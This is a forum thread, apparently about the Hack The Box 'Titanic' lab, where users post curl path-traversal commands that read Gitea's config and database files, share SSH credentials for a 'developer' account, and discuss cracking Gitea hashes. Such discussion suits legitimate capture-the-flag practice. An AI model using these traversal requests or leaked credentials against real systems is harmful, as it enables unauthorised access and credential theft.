Possibly Related Threads…

kyakeiuwu · (This post was last modified: 02-15-2025, 07:42 PM by kyakeiuwu.)

curl 'http://titanic.htb/download?ticket=../../../../../home/developer/gitea/data/gitea/conf/app.ini'
this is big!

(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

do you know how to crack gitea hashes?

RedBlock · 02-15-2025, 07:43 PM

ssh creds for developer
developer : 25282528

smwhck · 02-15-2025, 07:44 PM

(02-15-2025, 07:41 PM)Saidakbarxon Wrote:
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file

kyakeiuwu · 02-15-2025, 07:45 PM

Got `curl 'http://titanic.htb/download?ticket=../../../../../home/developer/gitea/data/gitea/conf/app.ini'` this is big!

TechArtificer · 02-15-2025, 07:49 PM

(02-15-2025, 07:43 PM)LostGem Wrote: ssh creds for developer
developer : 25282528

how did you get that?
did you use the LFI?

legacyuser00001 · 02-15-2025, 07:50 PM

(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

How did you find the gitea directory? I know why it's developer, but not why gitea

kyakeiuwu · 02-15-2025, 07:51 PM

https://gist.github.com/h4rithd/0c5da36a...71cf14e271

Saidakbarxon · (This post was last modified: 02-15-2025, 07:53 PM by Saidakbarxon.)

(02-15-2025, 07:44 PM)smwhck Wrote:
(02-15-2025, 07:41 PM)Saidakbarxon Wrote:
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file

I don't think you'll find anything useful in the file.

(02-15-2025, 07:44 PM)smwhck Wrote:
(02-15-2025, 07:41 PM)Saidakbarxon Wrote:
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file

I don't think you'll find anything useful in the file.

kyakeiuwu · 02-15-2025, 07:56 PM

(02-15-2025, 07:53 PM)Saidakbarxon Wrote:
(02-15-2025, 07:44 PM)smwhck Wrote:
(02-15-2025, 07:41 PM)Saidakbarxon Wrote:
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
I don't think you'll find anything useful in the file.

(02-15-2025, 07:44 PM)smwhck Wrote:
(02-15-2025, 07:41 PM)Saidakbarxon Wrote:
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
I don't think you'll find anything useful in the file.

there's developer password in it!

TechArtificer · 02-15-2025, 07:57 PM

(02-15-2025, 07:51 PM)kyakeiuwu Wrote: https://gist.github.com/h4rithd/0c5da36a...71cf14e271

Thank you, that was very helpful

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	22	2,459	Yesterday, 02:15 PM Last Post: hashxyz
	HTB Eloquia User and Root Flags - Insane Box	69646B	13	769	03-27-2026, 06:14 PM Last Post: vlxw
	HTB - ARTIFICIAL.HTB - EASY LINUX	chain	0	439	02-10-2026, 02:12 PM Last Post: chain
	HTB - CONVERSOR.HTB - EASY LINUX	chain	0	270	02-09-2026, 04:36 PM Last Post: chain
	HTB - FACTS.HTB - EASY LINUX	chain	2	316	02-09-2026, 11:02 AM Last Post: chain